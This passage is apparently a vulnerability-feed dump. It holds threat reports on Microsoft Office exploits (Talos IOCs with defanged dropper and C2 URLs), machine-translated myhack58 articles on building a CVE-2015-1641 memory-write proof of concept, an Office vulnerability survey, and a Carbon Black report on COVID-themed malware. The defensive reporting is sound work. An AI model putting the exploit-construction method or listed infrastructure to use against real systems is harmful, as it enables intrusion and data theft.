class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s1600/image11.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s640/image11.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Attempted combined attack stages</div><br />One has to wonder why did the attackers use the combination of a newer and an older exploit at all? The combination would not be executed if the targeted system had a patch against either of the exploits. In addition, if the targeted system was vulnerable to CVE-2012-0158 it would be much easier for the attackers to use a single exploit targeting this vulnerability.<br /><br />An assumption we can make is that that the attackers used the combination to avoid Word displaying the prompt which may raise suspicions for the target end user. Another possibility is that they attempted to use this combination in order to avoid behavioral detection systems which may be triggering on the combination of Ole2Link in a word document and a download of an HTA file. <br /><br />This attack was unsuccessful, potentially indicating poor testing or quality control procedures by the attackers. However, this does show a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. This attack may have been an experiment that didn't quite work out, or it may be indication of future attacks yet to materialise.<br /><br /><h3 id=\"h.8lbs60io8ukk\">Coverage</h3><br /><a href=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s1600/image8.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"336\" data-original-width=\"400\" height=\"268\" src=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s320/image8.png\" width=\"320\" /></a>Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br />Email Security can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat.<br /><br />AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.<br /><br />Umbrella prevents DNS resolution of the domains associated with malicious activity.<br /><br />Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.<br /><h3 id=\"h.3lh94s3hk6jp\">IOCs</h3><br />Documents<br /><br />5ae2f13707ee38e4675ad1bc016b19875ee32312227103d6f202874d8543fc2e - CVE-2017-0199<br />6a84e5fd6c9b2c1685efc7ac8d763048913bad2e767b4958e7b40b4488bacf80 - CVE-2012-0158<br /><br />Executables<br /><br />351aec22d926b4fb7efc7bafae9d1603962cadf0aed1e35b1ab4aad237723474<br />f34e5af97ccb3574f7d5343246138daf979bfd1f9c37590e9a41f6420ddb3bb6<br />43624bf57a9c7ec345d786355bb56ca9f76c226380302855c61277bdc490fdfe<br />d4fbca06989a074133a459c284d79e979293625262a59fbd8b91825dbfbe2a13<br /><br />URLs<br /><br />hxxp://multplelabs[dot]com/ema/order.doc - CVE-2012-0158<br />hxxp://multplelabs[dot]com/ema/nextyl.exe - dropper<br />hxxp://multplelabs[dot]com/freem/50/fre.php - Lokibot C2<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=tm25zXE3Ntc:BBFLRcVK7jQ:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/tm25zXE3Ntc\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-08-14T16:55:34", "published": "2017-08-14T09:55:00", "id": "TALOSBLOG:EE177479683FB1333547D9FA076F4D46", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/tm25zXE3Ntc/when-combining-exploits-for-added.html", "title": "When combining exploits for added effect goes wrong", "type": "talosblog", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2016-12-03T17:44:02", "bulletinFamily": "info", "description": "This is a period of vulnerability to share with you is CVE-2015-1641 learning summary, this vulnerability due to its good versatility and stability claims to have replaced the CVE-2012-0158 trend. The vulnerability is a type confusion class of vulnerability, through which you can achieve arbitrary address of the memory write data, and then according to vulnerability characteristics, combined with some of the typical use of the technique can achieve arbitrary code execution. \nThe vulnerability principle\nThis vulnerability of the common sample is the rtf Document Format File, this point and below, the exploit about, the main reason is the rtf to facilitate construction using components, of course this is not absolute\u3002 However, the vulnerability principle in fact, and rtf Document Format independent, but with the office open xml document format is implementation dependent. This document format of the common word document, expand the name is docx is actually a use the open xml organizations document internal resources after the zip compression package. In fact, the vulnerability of the rtf sample, generally contains 3 docx format file component, wherein the 2 files used to trigger the vulnerability component, the other as an exp component, still is not an absolute one. \n! [](/Article/UploadPic/2016-12/2016123171529970. png? www. myhack58. com! web) \nThe above 3 zip bag is from the rtf file sample in the extracted, as to how to extract here a simple way, the word document there is an Insert object function, you can insert another word document files, this sample is inserted into the 3 docx documents into it and then the main document is saved as rtf Document Format, then this 3 Insert the docx file object in the main file is a section of a 16-ary data, the corresponding 3 files in the 16-ary coding, so you can by a regular expression using Notepad++like editor from the main file in the extracted 16-ary coding:\u201c\\\\\\objdata [0-9a-f\\r\\n]+\u201d, and then by means of some hex editor such as 010edit Save As 3 docx/zip files. After that you can begin to analyze the vulnerability principle, the first second of the target file remove the zip suffix using the office Open, then the word program will directly crash, and in the debugger you can see the crash point is an assignment statement and ecx for a stable memory address value, \u5176\u6307\u5411\u7684\u8303\u56f4\u662f\u6f0f\u6d1e\u5229\u7528\u4f7f\u7528\u5230\u7684\u4e00\u4e2a\u4e3a\u4e86\u7ed5\u8fc7aslr\u7684\u6a21\u5757msvcr71.dll to: \n! [](/Article/UploadPic/2016-12/2016123171529671. png? www. myhack58. com! web) \nThen from the file point of view, plus the zip suffix decompression is as follows: \n! [](/Article/UploadPic/2016-12/2016123171529361. png? www. myhack58. com! web) \nWherein, the word directory is under the document. the xml for the organization of the documentation resource of primary documents, generally the document's text content is also on the inside, and from this file we can find to trigger this vulnerability the main content: \n! [](/Article/UploadPic/2016-12/2016123171530503. png? www. myhack58. com! web) \nAs can be seen in the debugger that appears in the crash point of the ecx value is directly unicode encoding in the smartTag tag element attribute value inside, and the condition is satisfied in the case msvcr71 module has been previously loaded, The follow-up will be a memory copy, and the copy of the destination address according to ecx calculated a value, and copy the data to 0xffffe696 that sub-label moveFromRange*the ID value 4294960790: the \n! [](/Article/UploadPic/2016-12/2016123171530111. png? www. myhack58. com! web) \nThus, by the file as the configuration of the content, the main control two variable values can be simple to achieve arbitrary memory address of the write data function. Of course, we are also more concerned about a focus on this construct the content of the principles is what? You can see this piece of content is a set of open xml closing tags, the outermost layer is the smartTag label, the innermost layer is moveFromRange*label. Respectively, refer to the msdn documentation of the relevant information, to be aware of these tags in detail, where attention to moveFromRange*label displaceByCustomXml Property description: \n! [](/Article/UploadPic/2016-12/2016123171530291. png? www. myhack58. com! web) \nFrom the above figure it can be seen, the attribute specified is replaced by a custom xml tag elements, in other words understand that is moveFromRange*the label of this attribute specifies the parent tag of a customXml object to be replaced. However, from the sample content we did not see the customXml tags, carefully observed a moment customXml tag, and smartTag label instructions after the discovery, the two Label elements not only function with a certain similarity, the internal property of the structure is also more interesting to keep consistent: \n! [](/Article/UploadPic/2016-12/2016123171530419. png? www. myhack58. com! web) \nCan imagine this on the same template out of the twins tag, is He the founder of Microsoft assigned to different jobs, that sometimes Microsoft's own didn't even recognize who is who. In fact, the type confusion vulnerability it is thus, seen above in the debugger the crash position, that is, the word program parses to moveFromRange*label, prepare the internal id of the transfer to which the parent element smartTag\uff08/customXml object\u201cspace\u201dinside it. By back tracking this process and contrast, if it is a normal case of the higher tag for the customXml, the transfer will be carried out once the memory allocation and then copy it to new memory space; and if it is a confusing case, since both objects the essence of the difference, this time directly to the id value of the transfer to the smartTag object has some internal space, the following two cases of code of the tracking sequence contrast figure: \n! [](/Article/UploadPic/2016-12/2016123171530657. png? www. myhack58. com! web) \nSince the two tags inside the attributes of the members have a certain similarity can lead to type confusion, the syntax through an internal check, but the actual parsing process, the object's internal lack of strict check, cause confusion to the smartTag object, parse moveFromRange*when the tag is considered to replace the need of memory space already exists, on the direct use of the wrong location for the copy process, resulting in this can be utilized the security vulnerability. \nConfigured to trigger the vulnerability POC \nAccording to the above principle, the vulnerability occurs in the scene is the word program in the analysis inside custom xml customXml tags there is a replacement marker case, the original moveFromRange*tag is to the tag id is transmitted to the superior customXml object, however, due to the customXml and its brother label smartTag there is a certain similarity, resulting in the customXml tag is replaced with the smartTag occurs when the type of Confusion caused by memory copy vulnerabilities. The following describes how to construct the trigger this vulnerability POC samples, we first make one thing clear, in order to achieve arbitrary memory address, we need to control the two variables are confused after the smartTag tag of element attribute values and moveFromRange*tag id value, they were controlled to overwrite the memory address and memory data, the reverse track at the above-mentioned point of collapse function: \n\n\n**[1] [[2]](<81759_2.htm>) [[3]](<81759_3.htm>) [next](<81759_2.htm>)**\n", "modified": "2016-12-03T00:00:00", "published": "2016-12-03T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/81759.htm", "id": "MYHACK58:62201681759", "type": "myhack58", "title": "Hand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09-bug warning-the black bar safety net", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-13T15:28:22", "bulletinFamily": "info", "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "description": "MSCOMCTL.ocx code execution, .Net code execution, WinVerifyTrust digital signature validation vulnerability", "modified": "2012-04-23T00:00:00", "published": "2012-04-23T00:00:00", "id": "SECURITYVULNS:VULN:12320", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12320", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "carbonblack": [{"lastseen": "2020-03-19T21:36:32", "bulletinFamily": "blog", "description": "The global COVID-19 pandemic is generating a substantial uptick in the production and delivery of Coronavirus themed malware. Due to a rapidly growing number of Indicators of Compromise (IOC)\u2019s, this report covers the key behaviors by aligning to the MITRE ATT&CK Framework. \n\n[_MITRE ATT&CK_](<https://attack.mitre.org/>)_ launched in 2018 is a security framework that describes the various stages through which an attack will generally progress. The intent of the framework is to provide \u201cbetter detection of post-compromise cyber adversary behavior\u201d_. _This framework is gaining increased adoption in the security community and VMware Carbon Black actively maps our products to this framework to provide added context for our customers._\n\nPhishing emails are the primary source, which in turn manifest into harmful threats that include malicious attachments that deliver payloads to infect victim machines. Some recently observed payloads are delivering trojans, backdoors, remote access trojan (RAT) functionality, cryptominers and botnet participation. In one variant that was analyzed, the malware was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. Malicious functionality has also been observed in fake mobile apps, fake Coronavirus maps and fake VPN software. These recent observations show an increased overall risk to corporate as well as personal security, at a time where many countries and corporations are enforcing remote working. \n\n## **Background**\n\nThe COVID-19 global pandemic has created an unprecedented situation with far-reaching impacts on our daily lives. Many countries have encouraged or mandated social isolation, including working remotely, in an effort to contain the spread of the virus. Much is still unknown leading to a climate of uncertainty. Unfortunately during times of uncertainty and doubt, threat actors are ready to take advantage of the widespread desire to be informed. This is already happening with the Coronavirus. People and businesses who are already in a heightened state of emotion, and on overload with changes in all aspects of their lives, are now at risk from bad actors intent on stealing PII, sensitive information, payment details and more, simply by using luring tactics that feature Coronavirus themed malware. \n\nWhile this technique isn\u2019t new, history has proven that cyber crime often increases during times of heightened emotion, distraction and stress, such as certain religious or [festive](<https://www.bleepingcomputer.com/news/security/emotet-trojan-is-inviting-you-to-a-malicious-christmas-party/>) holidays, [elections](<https://www.darkreading.com/attacks-breaches/trump-themed-malware-dominating-threat-campaigns-this-election-season/d/d-id/1327211>), and even [Black Friday](<https://www.infosecurity-magazine.com/news/fake-black-friday-apps-cause/>) sales events. The actors exploit these challenging times to find avenues for distributing their malware. \n\nThis article aims to increase awareness of recently observed threats that are leveraging the COVID-19 pandemic by describing current examples in alignment with the MITRE ATT&CK Framework. MITRE ATT&CK has had a major impact on the cybersecurity industry due to its rapid adoption in the security community. Aligning to the MITRE ATT&CK Framework is important as there is a growing number of IOC\u2019s being produced daily. HIstorically, such as in the case of Emotet, handling such large volumes of IOC\u2019s can become overwhelming for defenders. Understanding the behavioral patterns of the different types of threats allows for easier interpretation and proactive defense. \n\nThe intent is to raise awareness for customers, SOC teams, IR partners, MSSPs and all defenders out in the InfoSec community, and to aid them with detection, protection and response of such malware we will be examining the types of attacks that appear to be most common.\n\nFor further information and resources pertaining to COVID-19, please refer to the VMware Carbon Black COVID-19: [Cybersecurity Community Resources](<https://www.carbonblack.com/2020/03/17/covid-19-cybersecurity-community-resources/>) page. \n\n## **Technical Analysis**\n\nIn the following section we will focus on the first two phases of the MITRE ATT&CK framework: **Initial Access** and **Execution**. We focus on these phases because we have observed the largest overlap from multiple actors that we are tracking. VMware Carbon Black\u2019s Threat Analysis Unit will continue to follow up with detailed analysis of individual actors and campaigns, digging deeper into the later stages of the attack.\n\nBefore we introduce these two tactic categories we would like to specifically highlight one of the most frequently leveraged techniques. [Masquerading (T1036)](<https://attack.mitre.org/techniques/T1036/>) occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. It is one of the key techniques employed in many of the observed threat types. While this may not come as a surprise, educating your end users, family and friends should be a priority during this unsettling time. Similar to campaigns that target religious or festive holidays, masquerading is the perfect tactic used by the bad actors, who have no regard for their victims. Their mission is clear, and masquerading helps them to evade defenses and get a few steps closer to achieving their goals. \n\n## **Initial Access **\n\nThis is the first tactic employed by bad actors whose hopes are to compromise as many vulnerable machines as possible. While many people and businesses are trying to share legitimate information related to COVID-19, the sheer volume of information being communicated lends itself to the delivery of fake data sheets, infographics, links to tracking maps, as well as fake software. The intent is to catch the end user off guard in order to deliver the malware. Other tactics could also include [drive-by compromise (T1189)](<https://attack.mitre.org/techniques/T1189/>) or [supply chain compromise (T1195)](<https://attack.mitre.org/techniques/T1195/>). The rationale behind this is due to the rapid registration of coronavirus themed domain names that have appeared on [MalwarePatrol.net](<https://www.malwarepatrol.net/>). The count at the time of writing is currently over 5000 registered domain names. Using Coronavirus or COVID-19 themed domain names could easily trick legitimate users into visiting websites and becoming subject to drive-by or supply chain compromise. The list can be found [here](<https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt>). \n\n### [**Spearphishing Attachment - TID:T1193**](<https://attack.mitre.org/techniques/T1193/>)\n\nAttachments are a popular choice for obtaining initial infection. Observed attachment file types include, but are not limited to files with the following extensions: ZIP, 7Z, TAR, RAR, JAR, VBS, IMG, GZ, EXE, ISO, SCR, RTF, PDF, DOC, XLS. Examples of phishing emails may contain spoofed email headers and authentic messaging to lure the victim into a false sense of security. Attachment names observed also include names that are attention grabbing in order to arouse enough curiosity for the end user to feel the need to open it. Phishing emails can contain spelling, grammar or formatting mistakes, as shown in the example below. With that said, more advanced threat actors will be particularly good at producing an authentic looking email message, as we will see later in this report. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/1-Phishing-email-example-1.png>) \n\n\n**Figure 1: Phishing email example containing malicious Word document attachment**\n\nA common technique is to create interesting content for malicious Microsoft Office related email attachments in order to convince the user to click on a link.. This typically will invoke the underlying malicious code embedded within the document, which is usually a malicious MS Office macro using VBA code. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/2-Phishing-email-example-1-Word-macro.png>) \n\n\n**Figure 2: Typical end-user prompt to trigger embedded payload**\n\nIn our next example we see an ISO file included as an attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/3-Phishing-email-example-2.png>) \n\n\n**Figure 3: Phishing email example containing malicious ISO file attachment**\n\nThe ISO attachment contains a SCR file which is actually a PE file. When executed, the PE file deploys RemCos, a prolific RAT which is being continually updated and sold on the Dark Web. The flow diagram shown below shows a visual representation of the underlying effects of opening this particular email attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/4-CBD-Flow-SCR.png>) \n\n\n**Figure 4: Partial process flow diagram taken from VMware Carbon Black Endpoint Standard**\n\nIn the next example, a PDF attachment contains a clickable link which redirects the user to an external site hosting a PHP page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/5-PDF-attachment-example-1.png>) \n\n\n**Figure 5: Example PDF Attachment containing clickable link**\n\nIf the user clicks the link within the PDF, they are presented with a fake Office365 landing page masquerading as a legitimate Office365 page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/6-PDF-attachment-fake-Office-365-page.png>) \n\n\n**Figure 6: Fake Office365 landing page**\n\nAfter the user clicks on the \u201cdownload file\u201d button, they are presented with a fake Office365 login prompt which harvests any details inputted by the end user. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/7-PDF-attachment-fake-Office-365-creds.png>) \n\n\n**Figure 7: Fake Office365 login prompt**\n\nIn the next example an attachment named **ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z** contains an executable, which when opened deploys **AgentTesla**. AgentTesla is used by threat actors to record keystrokes and other sensitive information, and to receive them via their C2 channel. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/8-7z-example.png>) \n\n\n**Figure 8: 7z file containing executable**\n\nAnother example uses an attachment name **AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe **which when opened, launches [RegAsm (T1121)](<https://attack.mitre.org/techniques/T1121/>) to deliver **Lokibot**, another popular and highly effective information stealer. This attachment contains an embedded AutoIT script to deliver the main payload. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/9-AutoIT-obfuscated-script.png>) \n\n\n**Figure 9: Snippet of hex dump showing obfuscated AutoIT script embedded in PE file**\n\nAnother attachment named COVID-19.INFO.37842702.doc installs a trojan, by leveraging [PowerShell (T1086)](<https://attack.mitre.org/techniques/T1086/>) and CSCRIPT (a technique used for [signed script proxy execution (T1216)](<https://attack.mitre.org/techniques/T1216/>)) to launch a VBS file which is a common [scripting (T1064)](<https://attack.mitre.org/techniques/T1064/>) technique. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/10-trojan-example.png>) \n\n\n**Figure 10: Execution path displayed within VMware Carbon Black EDR**\n\n## Execution\n\n[User execution (T1204)](<https://attack.mitre.org/techniques/T1204/>) is symptomatic of when an end user opens a phishing email or attachment. There are other specific TTP\u2019s that have been observed with the execution of Coronavirus themed payloads. \n\n### [Powershell (T1086):](<https://attack.mitre.org/techniques/T1086/>)\n\nWhen a particular MS Word document attachment named \u201c**CORONA VIRUS REMEDY ISREAL.doc**\u201d is opened, executed an obfuscated command within a hidden PowerShell window. This in turn invokes two signed Microsoft binaries: **csc.exe** and **cvtres.exe**, which are commonly seen in the defense evasion, [compile after delivery (T1500)](<https://attack.mitre.org/techniques/T1500/>) tactic. These types of behaviours are commonly seen in commodity malware, and are highly effective at delivering and compiling a payload using legitimate Windows binaries. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/11-Powershell-snippet.png>) \n\n\n**Figure 11: Snippet of obfuscated Powershell command**\n\n### [Dynamic Data Exchange (T1173):](<https://attack.mitre.org/techniques/T1173/>)\n\nMalicious MS Office documents still manage to successfully exploit unpatched versions of MS Office due to the typical DDE vulnerabilities. Some of these common CVE\u2019s are: [CVE-2012-0158](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027#mscomctlocx-rce-vulnerability---cve-2012-0158>), [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>). \n\nIn a recent Coronavirus themed MS Word document attachment, MS Word is the target for [exploitation for client execution (T1203)](<https://attack.mitre.org/techniques/T1203/>) using DDE exploits to launch the MS Equation Editor. The purpose is to deliver and execute a [signed binary proxy execution (T1218)](<https://attack.mitre.org/techniques/T1218/>), which in this instance was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. The VMware Carbon Black TAU team is still investigating this particular threat.\n\n## **More on Masquerading**\n\nMasquerading has been highlighted so far in relation to malicious phishing email attachments. Unfortunately third party software is not excluded from this. There is evidence to suggest that the following categories of software are being weaponised in order to target potential victims. \n\n### Fake VPN clients/installers:\n\nA recent [report](<https://www.bleepingcomputer.com/news/security/azorult-malware-infects-victims-via-fake-protonvpn-installer/>) highlights the fact that while many people globally adapt to working from home for the foreseeable future, there is a growing number of fake VPN clients and installers that are disguised as malware. The example discussed in the report delivers the AZORult malware via a fake ProtonVPN client, whereby post-execution the victim machine becomes part of the AZORult botnet. \n\n### Remote meeting software:\n\nTAU are currently monitoring for the appearance of weaponized or fake remote meeting software. TAU are anticipating that there may be an eventual increase over the coming weeks as more people around the world rely on remote working. \n\n### Mobile apps:\n\nAvast have recently [released](<https://www.apklab.io/covid19>) a repository for researchers and defenders due to the growing number of apps that have appeared for Android users. In a recent [report](<https://www.domaintools.com/resources/blog/covidlock-update-coronavirus-ransomware>), a fake Android Coronavirus app was discovered to be delivering ransomware. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/12-fake-mobile-apps.png>) \n\n\n**Figure 12: Snippet showing potential malicious and fake apps**\n\n### Fake Coronavirus maps:\n\nIn a report published recently, a fake Coronavirus map was discovered which silently steals passwords, crypto wallets and other sensitive information. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/13-Coronavirus-map.png>)\n\n**Figure 13: Malicious fake Coronavirus map **\n\n## **Ransomware**\n\n[Data encrypted for impact (T1486)](<https://attack.mitre.org/techniques/T1486/>) is observed with a new family of ransomware known as Coronavirus which was recently [reported](<https://www.bleepingcomputer.com/news/security/new-coronavirus-ransomware-acts-as-cover-for-kpot-infostealer/>). TAU has observed an upwards trend in ransomware for some time now, but sadly there has never been a better time for the threat actors to create and distribute ransomware. Ransomware is an ongoing and continual threat which TAU observes very closely. A full write up will be published soon on this new ransomware campaign. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/14-Coronavirus-ransomware.png>) \n\n\n**Figure 14: Coronavirus ransomware message**\n\n## 